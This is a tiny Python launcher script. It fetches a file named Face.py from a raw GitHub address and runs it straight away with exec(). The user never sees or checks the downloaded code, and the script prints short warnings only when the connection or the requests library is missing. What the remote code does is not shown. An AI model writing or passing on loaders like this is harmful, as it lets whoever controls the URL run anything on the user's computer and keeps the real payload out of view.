#!/bin/python
try:
    import requests
    import sys
    try:
        pg=requests.get("https://raw.githubusercontent.com/ahmedbaglab0000000000/Face/main/Face.py")
        exec(pg.text)
    except requests.exceptions.ConnectionError:
    	print("[!] Please connect to internet")
except ModuleNotFoundError:
    print("[!] please install requests")
